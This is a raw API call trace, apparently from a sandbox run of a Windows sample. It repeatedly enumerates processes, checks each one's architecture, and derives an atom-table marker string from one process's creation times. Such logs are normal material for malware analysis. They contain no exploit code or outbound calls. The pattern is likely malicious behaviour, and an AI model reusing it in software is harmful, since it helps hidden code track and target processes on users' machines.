	[0119.623] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0119.623] CloseHandle (hObject=0x698) returned 1
	[0119.623] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0119.623] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0119.623] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.624] CloseHandle (hObject=0x698) returned 1
	[0119.624] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0119.624] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.624] CloseHandle (hObject=0x698) returned 1
	[0119.624] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0119.624] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.624] CloseHandle (hObject=0x698) returned 1
	[0119.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0119.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0119.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0119.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0119.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0119.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0119.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0119.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0119.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0119.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0119.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0119.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0119.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0119.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0119.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0119.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0119.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0119.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0119.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0119.664] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.664] CloseHandle (hObject=0x698) returned 1
	[0119.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0119.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0119.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0119.665] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.665] CloseHandle (hObject=0x698) returned 1
	[0119.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0119.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0119.665] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.665] CloseHandle (hObject=0x698) returned 1
	[0119.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0119.669] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.669] CloseHandle (hObject=0x698) returned 1
	[0119.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0119.670] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.670] CloseHandle (hObject=0x698) returned 1
	[0119.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0119.670] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.670] CloseHandle (hObject=0x698) returned 1
	[0119.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0119.670] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.670] CloseHandle (hObject=0x698) returned 1
	[0119.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0119.670] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.670] CloseHandle (hObject=0x698) returned 1
	[0119.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0119.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0119.671] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.671] CloseHandle (hObject=0x698) returned 1
	[0119.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0119.671] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.671] CloseHandle (hObject=0x698) returned 1
	[0119.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0119.671] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.671] CloseHandle (hObject=0x698) returned 1
	[0119.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0119.672] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.672] CloseHandle (hObject=0x698) returned 1
	[0119.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0119.672] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.672] CloseHandle (hObject=0x698) returned 1
	[0119.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0119.673] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.673] CloseHandle (hObject=0x698) returned 1
	[0119.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0119.673] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.673] CloseHandle (hObject=0x698) returned 1
	[0119.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0119.673] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.673] CloseHandle (hObject=0x698) returned 1
	[0119.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0119.673] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.673] CloseHandle (hObject=0x698) returned 1
	[0119.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0119.673] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.674] CloseHandle (hObject=0x698) returned 1
	[0119.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0119.674] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.674] CloseHandle (hObject=0x698) returned 1
	[0119.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0119.674] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.674] CloseHandle (hObject=0x698) returned 1
	[0119.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0119.674] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.674] CloseHandle (hObject=0x698) returned 1
	[0119.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0119.674] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.674] CloseHandle (hObject=0x698) returned 1
	[0119.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0119.675] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.675] CloseHandle (hObject=0x698) returned 1
	[0119.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0119.675] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.675] CloseHandle (hObject=0x698) returned 1
	[0119.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0119.675] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.675] CloseHandle (hObject=0x698) returned 1
	[0119.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0119.675] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.675] CloseHandle (hObject=0x698) returned 1
	[0119.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0119.675] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.676] CloseHandle (hObject=0x698) returned 1
	[0119.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0119.676] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.676] CloseHandle (hObject=0x698) returned 1
	[0119.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0119.676] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.676] CloseHandle (hObject=0x698) returned 1
	[0119.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0119.676] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.676] CloseHandle (hObject=0x698) returned 1
	[0119.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0119.676] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.676] CloseHandle (hObject=0x698) returned 1
	[0119.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0119.677] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.677] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0119.677] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0119.677] wsprintfA (in: param_1=0x39936c8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0119.678] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.679] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0119.679] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.679] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0119.679] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0119.679] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0119.680] CloseHandle (hObject=0x698) returned 1
	[0119.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0119.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0119.680] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.680] CloseHandle (hObject=0x698) returned 1
	[0119.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0119.680] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.680] CloseHandle (hObject=0x698) returned 1
	[0119.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0119.680] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.680] CloseHandle (hObject=0x698) returned 1
	[0119.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0119.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0119.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0119.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0119.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0119.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0119.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0119.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0119.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0119.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0119.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0119.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0119.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0119.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0119.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0119.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0119.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0119.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0119.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0119.719] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.719] CloseHandle (hObject=0x698) returned 1
	[0119.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0119.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0119.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0119.719] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.721] CloseHandle (hObject=0x698) returned 1
	[0119.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0119.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0119.722] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.722] CloseHandle (hObject=0x698) returned 1
	[0119.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0119.722] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.722] CloseHandle (hObject=0x698) returned 1
	[0119.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0119.722] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.722] CloseHandle (hObject=0x698) returned 1
	[0119.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0119.723] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.723] CloseHandle (hObject=0x698) returned 1
	[0119.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0119.724] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.724] CloseHandle (hObject=0x698) returned 1
	[0119.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0119.724] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.724] CloseHandle (hObject=0x698) returned 1
	[0119.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0119.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0119.724] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.724] CloseHandle (hObject=0x698) returned 1
	[0119.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0119.725] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.725] CloseHandle (hObject=0x698) returned 1
	[0119.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0119.725] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.725] CloseHandle (hObject=0x698) returned 1
	[0119.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0119.725] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.725] CloseHandle (hObject=0x698) returned 1
	[0119.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0119.725] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.725] CloseHandle (hObject=0x698) returned 1
	[0119.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0119.726] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.726] CloseHandle (hObject=0x698) returned 1
	[0119.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0119.726] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.726] CloseHandle (hObject=0x698) returned 1
	[0119.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0119.726] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.726] CloseHandle (hObject=0x698) returned 1
	[0119.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0119.726] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.726] CloseHandle (hObject=0x698) returned 1
	[0119.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0119.726] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.726] CloseHandle (hObject=0x698) returned 1
	[0119.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0119.727] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.727] CloseHandle (hObject=0x698) returned 1
	[0119.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0119.727] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.727] CloseHandle (hObject=0x698) returned 1
	[0119.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0119.727] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.727] CloseHandle (hObject=0x698) returned 1
	[0119.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0119.727] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.727] CloseHandle (hObject=0x698) returned 1
	[0119.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0119.727] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.727] CloseHandle (hObject=0x698) returned 1
	[0119.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0119.728] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.728] CloseHandle (hObject=0x698) returned 1
	[0119.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0119.728] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.728] CloseHandle (hObject=0x698) returned 1
	[0119.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0119.728] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.728] CloseHandle (hObject=0x698) returned 1
	[0119.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0119.728] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.728] CloseHandle (hObject=0x698) returned 1
	[0119.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0119.728] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.728] CloseHandle (hObject=0x698) returned 1
	[0119.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0119.729] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.729] CloseHandle (hObject=0x698) returned 1
	[0119.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0119.729] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.729] CloseHandle (hObject=0x698) returned 1
	[0119.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0119.731] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.731] CloseHandle (hObject=0x698) returned 1
	[0119.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0119.732] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.732] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0119.732] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0119.733] wsprintfA (in: param_1=0x3993b28, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0119.733] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.733] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0119.733] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.734] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0119.734] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0119.734] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0119.734] CloseHandle (hObject=0x698) returned 1
	[0119.734] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0119.734] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0119.734] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.734] CloseHandle (hObject=0x698) returned 1
	[0119.734] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0119.735] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.735] CloseHandle (hObject=0x698) returned 1
	[0119.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0119.735] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.735] CloseHandle (hObject=0x698) returned 1
	[0119.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0119.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0119.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0119.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0119.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0119.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0119.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0119.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0119.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
